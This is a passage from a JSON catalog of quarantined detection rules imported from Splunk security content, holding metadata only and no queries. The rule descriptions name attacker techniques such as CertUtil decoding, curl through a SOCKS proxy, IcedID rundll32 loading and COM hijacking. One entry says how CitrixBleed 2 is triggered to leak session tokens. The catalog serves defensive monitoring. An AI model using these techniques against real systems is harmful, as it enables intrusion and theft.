attackers could gain control over network traffic, potentially leading to data breaches or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-new-login-attempts-to-routers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bce3ed7c-9b1f-42a0-abdf-d8b123a34836", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/detect_new_login_attempts_to_routers.yml" } }, { "id": "splunk-security-content-bd1c770f-1b55-411e-b49e-20d07bcac5f8", "type": "detection", "name": "Windows Modify Registry Configure BitLocker", "description": "This analytic is developed to detect suspicious registry modifications targeting BitLocker settings. The malware ShrinkLocker alters various registry keys to change how BitLocker handles encryption, potentially bypassing TPM requirements, enabling BitLocker without TPM, and enforcing specific startup key and PIN configurations. Such modifications can weaken system security, making it easier for unauthorized access and data breaches. Detecting these changes is crucial for maintaining robust encryption and data protection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-configure-bitlocker.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bd1c770f-1b55-411e-b49e-20d07bcac5f8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_configure_bitlocker.yml" } }, { "id": "splunk-security-content-bd35738c-e93a-4e4f-be24-f6a3680b950a", "type": "detection", "name": "Windows SpeechRuntime COM Hijacking DLL Load", "description": "SpeechRuntime is vulnerable to an attack that allows a user to run code on another user's session remotely and stealthily by exploiting a Windows COM class. When this class is invoked, it launches SpeechRuntime.exe in the context of the currently logged-on user. Because this COM class is susceptible to COM Hijacking, the attacker can alter the registry remotely to point to a malicious DLL. By dropping that DLL on the target system (e.g., via SMB) and triggering the COM object, the attacker causes the malicious DLL to load into SpeechRuntime.exe and executing under the user's context. This detection identifies suspicious DLL loads by SpeechRuntime.exe from outside the expected locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-speechruntime-com-hijacking-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bd35738c-e93a-4e4f-be24-f6a3680b950a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_speechruntime_com_hijacking_dll_load.yml" } }, { "id": "splunk-security-content-bd3b0187-189b-46c0-be45-f52da2bae67f", "type": "detection", "name": "Windows AdFind Exe", "description": "The following analytic identifies the execution of `adfind.exe` standalone or with specific command-line arguments related to Active Directory queries. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line arguments, and parent Processes. This activity is significant because `adfind.exe` is a powerful tool often used by threat actors like Wizard Spider and FIN6 to gather sensitive AD information. If confirmed malicious, this activity could allow attackers to map the AD environment, facilitating further attacks such as privilege escalation or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-adfind-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bd3b0187-189b-46c0-be45-f52da2bae67f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_adfind_exe.yml" } }, { "id": "splunk-security-content-bd596c22-ad1e-44fc-b242-817253ce8b08", "type": "detection", "name": "Linux Proxy Socks Curl", "description": "The following analytic detects the use of the `curl` command with proxy-related arguments such as `-x`, `socks`, `--preproxy`, and `--proxy`. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as it may indicate an adversary attempting to use a proxy to evade network monitoring and obscure their actions. If confirmed malicious, this behavior could allow attackers to bypass security controls, making it difficult to track their activities and potentially leading to unauthorized data access or exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090", "T1095" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-proxy-socks-curl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bd596c22-ad1e-44fc-b242-817253ce8b08", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_proxy_socks_curl.yml" } }, { "id": "splunk-security-content-bd5c311e-a6ea-48ae-a289-19a3398e3648", "type": "detection", "name": "Windows Identify Protocol Handlers", "description": "The following analytic identifies the use of protocol handlers executed via the command line. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This activity is significant because protocol handlers can be exploited to execute arbitrary commands or launch applications, potentially leading to unauthorized actions. If confirmed malicious, an attacker could use this technique to gain code execution, escalate privileges, or maintain persistence within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-identify-protocol-handlers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bd5c311e-a6ea-48ae-a289-19a3398e3648", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_identify_protocol_handlers.yml" } }, { "id": "splunk-security-content-bd8097ed-958a-4873-87d9-44f2b4d85705", "type": "detection", "name": "GCP Unusual Number of Failed Authentications From Ip", "description": "The following analytic identifies a single source IP failing to authenticate into Google Workspace with multiple valid users, potentially indicating a Password Spraying attack. It uses Google Workspace login failure events and calculates the standard deviation for source IPs, applying the 3-sigma rule to detect unusual failed authentication attempts. This activity is significant as it may signal an adversary attempting to gain initial access or elevate privileges. If confirmed malicious, this could lead to unauthorized access, data breaches, or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-unusual-number-of-failed-authentications-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bd8097ed-958a-4873-87d9-44f2b4d85705", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_unusual_number_of_failed_authentications_from_ip.yml" } }, { "id": "splunk-security-content-be19b369-fd0c-42be-ae97-c10b6c01638f", "type": "detection", "name": "Windows Potential AppDomainManager Hijack Artifacts Creation", "description": "The following analytic detects the creation of an .exe file along with its corresponding .exe.config and a .dll in the same directory, which is a common pattern indicative of potential AppDomain hijacking or CLR code injection attempts. This behavior may signal that a malicious actor is attempting to load a rogue assembly into a legitimate application's AppDomain, allowing code execution under the context of a trusted process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-potential-appdomainmanager-hijack-artifacts-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "be19b369-fd0c-42be-ae97-c10b6c01638f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_potential_appdomainmanager_hijack_artifacts_creation.yml" } }, { "id": "splunk-security-content-be254a5c-63e7-11ec-89da-acde48001122", "type": "detection", "name": "Linux Sudoers Tmp File Creation", "description": "The following analytic detects the creation of the \"sudoers.tmp\" file, which occurs when editing the /etc/sudoers file using visudo or another editor on a Linux platform. This detection leverages filesystem data to identify the presence of \"sudoers.tmp\" files. Monitoring this activity is crucial as adversaries may exploit it to gain elevated privileges on a compromised host. If confirmed malicious, this activity could allow attackers to modify sudoers configurations, potentially granting them unauthorized access to execute commands as other users, including root, thereby compromising the system's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-sudoers-tmp-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "be254a5c-63e7-11ec-89da-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_sudoers_tmp_file_creation.yml" } }, { "id": "splunk-security-content-be498b9f-d804-4bbf-9fc0-d5448466b313", "type": "detection", "name": "Windows Modify Registry Auto Minor Updates", "description": "The following analytic identifies a suspicious modification to the Windows auto update configuration registry. It detects changes to the registry path \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\AU\\\\AutoInstallMinorUpdates\" with a value of \"0x00000000\". This activity is significant as it is commonly used by adversaries, including malware like RedLine Stealer, to bypass detection and deploy additional payloads. If confirmed malicious, this modification could allow attackers to evade defenses, potentially leading to further system compromise and exploitation of zero-day vulnerabilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-auto-minor-updates.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "be498b9f-d804-4bbf-9fc0-d5448466b313", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_auto_minor_updates.yml" } }, { "id": "splunk-security-content-be6d868d-33b6-4aaa-912e-724fb555b11a", "type": "detection", "name": "Azure AD Successful Authentication From Different Ips", "description": "The following analytic detects an Azure AD account successfully authenticating from multiple unique IP addresses within a 30-minute window. It leverages Azure AD SignInLogs to identify instances where the same user logs in from different IPs in a short time frame. This behavior is significant as it may indicate compromised credentials being used by an adversary, potentially following a phishing attack. If confirmed malicious, this activity could allow unauthorized access to corporate resources, leading to data breaches or further exploitation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-successful-authentication-from-different-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "be6d868d-33b6-4aaa-912e-724fb555b11a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_successful_authentication_from_different_ips.yml" } }, { "id": "splunk-security-content-bed761f8-ee29-11eb-8bf3-acde48001122", "type": "detection", "name": "Suspicious IcedID Rundll32 Cmdline", "description": "The following analytic detects a suspicious `rundll32.exe` command line used to execute a DLL file, a technique associated with IcedID malware. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions containing the pattern `*/i:*`. This activity is significant as it indicates potential malware attempting to load an encrypted DLL payload, often named `license.dat`. If confirmed malicious, this could allow attackers to execute arbitrary code, leading to further system compromise and potential data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-icedid-rundll32-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bed761f8-ee29-11eb-8bf3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_icedid_rundll32_cmdline.yml" } }, { "id": "splunk-security-content-bef21d24-297e-45e3-9b9a-c6ac45450474", "type": "detection", "name": "Powershell Remote Services Add TrustedHost", "description": "The following analytic detects the execution of a PowerShell script that modifies the 'TrustedHosts' configuration via EventCode 4104. It leverages PowerShell Script Block Logging to identify commands targeting WSMan settings, specifically those altering or concatenating trusted hosts. This activity is significant as it can indicate attempts to manipulate remote connection settings, potentially allowing unauthorized remote access. If confirmed malicious, this could enable attackers to establish persistent remote connections, bypass security protocols, and gain unauthorized access to sensitive systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-remote-services-add-trustedhost.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bef21d24-297e-45e3-9b9a-c6ac45450474", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_remote_services_add_trustedhost.yml" } }, { "id": "splunk-security-content-bef92f3f-7dc8-413a-8989-50581039e250", "type": "detection", "name": "Citrix ADC and Gateway CitrixBleed 2 Memory Disclosure", "description": "This detection identifies potential exploitation attempts of CVE-2025-5777 (CitrixBleed 2), a memory disclosure vulnerability in Citrix NetScaler ADC and Gateway.\nThe vulnerability is triggered by sending POST requests with incomplete form data to the /p/u/doAuthentication.do endpoint, causing the device to leak memory contents including session tokens and authentication materials.\nThis search looks for POST requests to the vulnerable endpoint that may indicate scanning or exploitation attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/citrix-adc-and-gateway-citrixbleed-2-memory-disclosure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bef92f3f-7dc8-413a-8989-50581039e250", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/citrix_adc_and_gateway_citrixbleed_2_memory_disclosure.yml" } }, { "id": "splunk-security-content-bf0304b6-6250-11ec-9d7c-acde48001122", "type": "detection", "name": "Linux Setuid Using Chmod Utility", "description": "The following analytic detects the execution of the chmod utility to set the SUID or SGID bit on files, which can allow users to temporarily gain root or group-level access. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments related to chmod. This activity is significant as it can indicate an attempt to escalate privileges or maintain persistence on a system. If confirmed malicious, an attacker could gain elevated access, potentially compromising sensitive data or critical system functions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-setuid-using-chmod-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bf0304b6-6250-11ec-9d7c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_setuid_using_chmod_utility.yml" } }, { "id": "splunk-security-content-bf0a378e-5f3c-11ec-a6de-acde48001122", "type": "detection", "name": "Linux At Application Execution", "description": "The following analytic detects the execution of the \"At\" application in Linux, which can be used by attackers to create persistence entries on a compromised host. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and parent process names associated with \"at\" or \"atd\". This activity is significant because the \"At\" application can be exploited to maintain unauthorized access or deliver additional malicious payloads. If confirmed malicious, this behavior could lead to data theft, ransomware attacks, or other severe consequences. Immediate investigation is required to determine the legitimacy of the execution and mitigate potential risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-at-application-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bf0a378e-5f3c-11ec-a6de-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_at_application_execution.yml" } }, { "id": "splunk-security-content-bf39c3a3-b191-4d42-8738-9d9797bd0c3a", "type": "detection", "name": "Kubernetes DaemonSet Deployed", "description": "The following analytic detects the creation of a DaemonSet in a Kubernetes cluster. This behavior is identified by monitoring Kubernetes Audit logs for the creation event of a DaemonSet. DaemonSets ensure a specific pod runs on every node, making them a potential vector for persistent access. This activity is significant for a SOC as it could indicate an attempt to maintain persistent access to the Kubernetes infrastructure. If confirmed malicious, it could lead to persistent attacks, service disruptions, or unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-daemonset-deployed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bf39c3a3-b191-4d42-8738-9d9797bd0c3a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_daemonset_deployed.yml" } }, { "id": "splunk-security-content-bf471c94-0324-4b19-a113-d02749b969bc", "type": "detection", "name": "Windows Known GraphicalProton Loaded Modules", "description": "The following analytic detects the loading of DLL modules associated with the GraphicalProton backdoor implant, commonly used by SVR in targeted attacks. It leverages Sysmon EventCode 7 to identify specific DLLs loaded by processes. This activity is significant as it may indicate the presence of a sophisticated backdoor, warranting immediate investigation. If confirmed malicious, the attacker could gain persistent access to the compromised host, potentially leading to further exploitation and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-known-graphicalproton-loaded-modules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bf471c94-0324-4b19-a113-d02749b969bc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_known_graphicalproton_loaded_modules.yml" } }, { "id": "splunk-security-content-bf7a06ec-f703-11ea-adc1-0242ac120002", "type": "detection", "name": "Detect Zerologon via Zeek", "description": "The following analytic detects attempts to exploit the Zerologon CVE-2020-1472 vulnerability via Zeek RPC. It leverages Zeek DCE-RPC data to identify specific operations: NetrServerPasswordSet2, NetrServerReqChallenge, and NetrServerAuthenticate3. This activity is significant because it indicates an attempt to gain unauthorized access to a domain controller, potentially leading to a complete takeover of an organization's IT infrastructure. If confirmed malicious, the impact could be severe, including data theft, ransomware deployment, or other devastating outcomes. Immediate investigation of the identified IP addresses and RPC operations is crucial.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-zerologon-via-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bf7a06ec-f703-11ea-adc1-0242ac120002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_zerologon_via_zeek.yml" } }, { "id": "splunk-security-content-bfc840f5-c9c6-454c-aa13-b46fd0bf1e79", "type": "detection", "name": "Okta Suspicious Activity Reported", "description": "The following analytic identifies when an associate reports a login attempt as suspicious via an email from Okta. It leverages Okta Identity Management logs, specifically the `user.account.report_suspicious_activity_by_enduser` event type. This activity is significant as it indicates potential unauthorized access attempts, warranting immediate investigation to prevent possible security breaches. If confirmed malicious, the attacker could gain unauthorized access to sensitive systems and data, leading to data theft, privilege escalation, or further compromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-suspicious-activity-reported.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bfc840f5-c9c6-454c-aa13-b46fd0bf1e79", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_suspicious_activity_reported.yml" } }, { "id": "splunk-security-content-bfdaabe7-3db8-48c5-80c1-220f9b8f22be", "type": "detection", "name": "Windows Indirect Command Execution Via Series Of Forfiles", "description": "The following analytic detects excessive usage of the forfiles.exe process, which is often indicative of post-exploitation activities. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include process GUID, process name, and parent process. This activity is significant because forfiles.exe can be abused to execute commands on multiple files, a technique used by ransomware like Prestige. If confirmed malicious, this behavior could allow attackers to enumerate files, potentially leading to data exfiltration or further malicious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-indirect-command-execution-via-series-of-forfiles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bfdaabe7-3db8-48c5-80c1-220f9b8f22be", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_indirect_command_execution_via_series_of_forfiles.yml" } }, { "id": "splunk-security-content-bfe94226-8c10-11eb-a4b3-acde48001122", "type": "detection", "name": "CertUtil With Decode Argument", "description": "The following analytic detects the use of CertUtil.exe with the 'decode' argument, which may indicate an attempt to decode a previously encoded file, potentially containing malicious payloads. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving CertUtil.exe. This activity is significant because attackers often use CertUtil to decode malicious files downloaded from the internet, which are then executed to compromise the system. If confirmed malicious, this activity could lead to unauthorized code execution, further system compromise, and potential data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/certutil-with-decode-argument.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bfe94226-8c10-11eb-a4b3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/certutil_with_decode_argument.yml" } }, { "id": "splunk-security-content-bff0e7a0-317f-11ec-ab4e-acde48001122", "type": "detection", "name": "Wmic NonInteractive App Uninstallation", "description": "The following analytic identifies the use of the WMIC command-line tool attempting to uninstall applications non-interactively. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns associated with WMIC. This activity is significant because it is uncommon and may indicate an attempt to evade detection by uninstalling security software, as seen in IcedID malware campaigns. If confirmed malicious, this behavior could allow an attacker to disable security defenses, facilitating further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmic-noninteractive-app-uninstallation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bff0e7a0-317f-11ec-ab4e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmic_noninteractive_app_uninstallation.yml" } }, { "id": "splunk-security-content-c026e3dd-7e18-4abb-8f41-929e836efe74", "type": "detection", "name": "Detect Excessive Account Lockouts From Endpoint", "description": "The following analytic detects endpoints causing a high number of account lockouts within a short period. It leverages the Windows security event logs ingested into the `Change` datamodel, specifically under the `Account_Management` node, to identify and count lockout events. This activity is significant as it may indicate a brute-force attack or misconfigured system causing repeated authentication failures. If confirmed malicious, this behavior could lead to account lockouts, disrupting user access and potentially indicating an ongoing attack attempting to compromise user credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-excessive-account-lockouts-from-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c026e3dd-7e18-4abb-8f41-929e836efe74", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_excessive_account_lockouts_from_endpoint.yml" } }, { "id": "splunk-security-content-c03d4a49-cf9d-435b-86e9-c6f8c9b6c42e", "type": "detection", "name": "Linux Auditd Data Transfer Size Limits Via Split Syscall", "description": "The following analytic detects suspicious data transfer activities that involve the use of the `split` syscall, potentially indicating an attempt to evade detection by breaking large files into smaller parts. Attackers may use this technique to bypass size-based security controls, facilitating the covert exfiltration of sensitive data. By monitoring for unusual or unauthorized use of the `split` syscall, this analytic helps identify potential data exfiltration attempts, allowing security teams to intervene and prevent the unauthorized transfer of critical information from the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1030" ], "log_source": null, "playbook": null, 